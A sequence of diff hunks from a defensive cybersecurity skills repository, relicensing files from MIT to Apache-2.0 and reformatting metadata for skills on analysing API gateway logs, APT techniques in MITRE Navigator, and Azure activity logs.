      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,20 +1,54 @@
 ---
 name: analyzing-api-gateway-access-logs
-description: >
+description: 'Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect
-  Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect BOLA/IDOR
+  BOLA/IDOR attacks, rate limit bypass, credential scanning, and injection attempts.
-  attacks, rate limit bypass, credential scanning, and injection attempts. Uses pandas
+  Uses pandas for statistical analysis of request patterns and anomaly detection.
-  for statistical analysis of request patterns and anomaly detection. Use when
+  Use when investigating API abuse or building API-specific threat detection rules.
-  investigating API abuse or building API-specific threat detection rules.
+
  '
 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, api, gateway, access]
+tags:
-version: "1.0"
+- api-security
 - access-log-analysis
 - aws-api-gateway
 - kong
 - nginx
 - bola-detection
 - rate-limit-bypass
 - security-operations
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1190
 - T1110.004
 - T1078.004
 - T1119
 ---
 # Analyzing API Gateway Access Logs
 ## When to Use
 - When investigating security incidents that require analyzing api gateway access logs
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Familiarity with security operations concepts and tools
 - Access to a test or lab environment for safe execution
 - Python 3.8+ with required dependencies installed
 - Appropriate authorization for any testing activities
 ## Instructions
 Parse API gateway access logs to identify attack patterns including broken object
@@ -1,15 +1,12 @@
 #!/usr/bin/env python3
 """Agent for analyzing API Gateway access logs for security threats."""
 import os
 import re
 import json
 import argparse
 from datetime import datetime
 from collections import defaultdict
 import pandas as pd
 import numpy as np
 def load_api_logs(log_path):
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,39 @@
 ---
 name: analyzing-apt-group-with-mitre-navigator
-description: Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap analysis and threat-informed defense.
+description: Analyze advanced persistent threat (APT) group techniques using MITRE
  ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap
  analysis and threat-informed defense.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [mitre-attack, navigator, apt, threat-actor, ttp-analysis, heatmap, detection-gap, threat-intelligence]
+tags:
-version: "1.0"
+- mitre-attack
 - navigator
 - apt
 - threat-actor
 - ttp-analysis
 - heatmap
 - detection-gap
 - threat-intelligence
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 d3fend_techniques:
 - Executable Denylisting
 - Execution Isolation
 - File Metadata Consistency Validation
 - Content Format Conversion
 - File Content Analysis
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1059.001
 - T1071.001
 - T1003.001
 - T1486
 - T1547.001
 ---
 # Analyzing APT Group with MITRE ATT&CK Navigator
@@ -14,6 +41,14 @@ license: MIT
 MITRE ATT&CK Navigator is a web-based tool for annotating and exploring ATT&CK matrices, enabling analysts to visualize threat actor technique coverage, compare multiple APT groups, identify detection gaps, and build threat-informed defense strategies. This skill covers querying ATT&CK data programmatically, mapping APT group TTPs to Navigator layers, creating multi-layer overlays for gap analysis, and generating actionable intelligence reports for detection engineering teams.
 ## When to Use
 - When investigating security incidents that require analyzing apt group with mitre navigator
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.9+ with `attackcti`, `mitreattack-python`, `stix2`, `requests` libraries
@@ -36,7 +71,7 @@ ATT&CK catalogs over 140 threat groups with documented technique usage. Each gro
 The Navigator supports loading multiple layers simultaneously, allowing analysts to overlay threat actor TTPs against detection coverage to identify gaps, compare multiple APT groups to find common techniques worth prioritizing, and track technique coverage changes over time.
-## Practical Steps
+## Workflow
 ### Step 1: Query ATT&CK Data for APT Group
@@ -8,7 +8,6 @@ performs detection gap analysis, and generates threat-informed reports.
 import json
 import os
 import sys
 import hashlib
 from collections import Counter
 try:
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,20 +1,53 @@
 ---
 name: analyzing-azure-activity-logs-for-threats
-description: >
+description: 'Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query
-  Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query to
+  to detect suspicious administrative operations, impossible travel, privilege escalation,
  detect suspicious administrative operations, impossible travel, privilege escalation,
  and resource modifications. Builds KQL queries for threat hunting in Azure environments.
  Use when investigating suspicious Azure tenant activity or building cloud SIEM detections.
  '
 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, azure, activity, logs]
+tags:
-version: "1.0"
+- azure
 - cloud-security
 - azure-monitor
 - kql
 - threat-hunting
 - activity-logs
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1078.004
 - T1098.003
 - T1538
 - T1556.009
 - T1580
 ---
 # Analyzing Azure Activity Logs for Threats
 ## When to Use
 - When investigating security incidents that require analyzing azure activity logs for threats
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Familiarity with security operations concepts and tools
 - Access to a test or lab environment for safe execution
 - Python 3.8+ with required dependencies installed
 - Appropriate authorization for any testing activities
 ## Instructions
 Use azure-monitor-query to execute KQL queries against Azure Log Analytics workspaces,
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
